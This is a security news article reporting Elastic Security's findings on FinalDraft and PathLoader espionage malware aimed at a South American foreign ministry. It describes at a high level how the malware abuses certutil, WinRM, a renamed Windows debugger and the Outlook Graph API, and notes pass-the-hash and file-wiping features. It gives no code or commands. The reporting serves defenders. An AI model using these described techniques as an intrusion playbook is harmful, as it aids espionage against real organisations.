CISOs have yet another attack vector to worry about with the discovery of a new family of data-stealing malware that uses Microsoft Outlook as a communications channel through abusing the Graph API, and includes a way to get around hashed passwords.
Researchers from Elastic Security say the malware was created by an unnamed group targeting the foreign ministry of a South American nation, but there are also links to compromises at a university in Southeast Asia and telecoms in that region.
The campaign is characterized by a “well-engineered, highly-capable, novel intrusion set, the researchers say in a report.
The campaign against the South American country may have started in November, 2024. That’s when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country’s Foreign Ministry. It isn’t clear how the IT system was initially compromised, but the gang used living-off-the- land tactics once inside. That included using Windows’ certutil application – which handles certificates — to download files.
Espionage seems to be the motive, says the report, and there are Windows and Linux versions of the malware. But fortunately the gang “exhibited poor campaign management and inconsistent evasion tactics,” it notes.
Watch for the signs
Nevertheless, CISOs should be watching for signs of attack using this group’s techniques, because their targets could become more widespread and the techniques more sophisticated.
One thing CISOs should immediately note: After initial compromise, the gang used Windows Remote Management’s Remote shell plugin (WinrsHost.exe) – a client-side process used by Windows Remote Management — to download files. These files include an executable, rar, ini, and log files. The executable is a renamed version of a Windows-signed debugger, CDB.exe. Abuse of this binary, the report notes, allowed the attackers to execute malicious shellcode delivered in a config.ini file under the guise of trusted binaries, the report says.
Using WRM’s shell plugin “indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,” the report says. “How these credentials were obtained is unknown.”
Preventing lateral movement is always tricky if an attacker has obtained valid credentials, noted Johannes Ullrich, dean of research at the SANS Institute, in an email to CSO. “They could come from other breaches (credential stuffing) or maybe just from keystroke loggers or info stealers they may have deployed during earlier phases of the attack that are not covered in the writeup.”
The main components of the malware this attacker uses, which include a loader and a backdoor, are:
- Pathloader, a lightweight Windows executable file that downloads and executes encrypted shellcode hosted on a remote server. It uses techniques to avoid immediate execution in a target organization’s sandbox. To block static analysis, it performs API hashing and string encryption;
- FinalDraft, 64-bit malware written in C++ that focuses on data exfiltration and process injection. It includes several modules that can be injected by the malware; their output is forwarded to a command and control (C2) server.
Among other things, it initially gathers information about compromised servers or PCs, including computer name, the account username, internal and external IP addresses, and details about running processes. FinalDraft also includes a pass-the-hash toolkit similar to Mimikatz to deal with stolen NTLM hashes.
One method of communication is via the Outlook mail service, using the Microsoft Graph API. This API allows developers to access resources hosted on Microsoft cloud services, including Microsoft 365. Although a login token is needed for this API, the FinalDraft malware has the ability to capture a Graph API token. According to a report by Symantec last year, a growing number of threat actors are abusing Graph API to hide communications.
In addition, FinalDraft can, among other things, install a TCP listener after adding a rule to the Windows Firewall. This rule is removed when the server shuts down. It can also delete files – and prevents IT from recovering them by overwriting the data with zeros before deletion.
“I think this is a great example at using the “living-off-the-land” (LOLBins) technique to its fullest potential,” commented Ullrich. “This points to an adversary who did their homework to customize this attack to most effectively hit this target. An attack like this is truly difficult to defend against. the ‘Advanced’ in APT [advanced persistent threat] is often more visible in this preparation vs the actual tools used and execution of an attack.”
Detection rules
At the end of its report, Elastic Security lists several Yara rules it created and posted on GitHub to help defenders. These rules help detect PathLoader and FinalDraft on Windows, while this rule detects FinalDraft on Linux.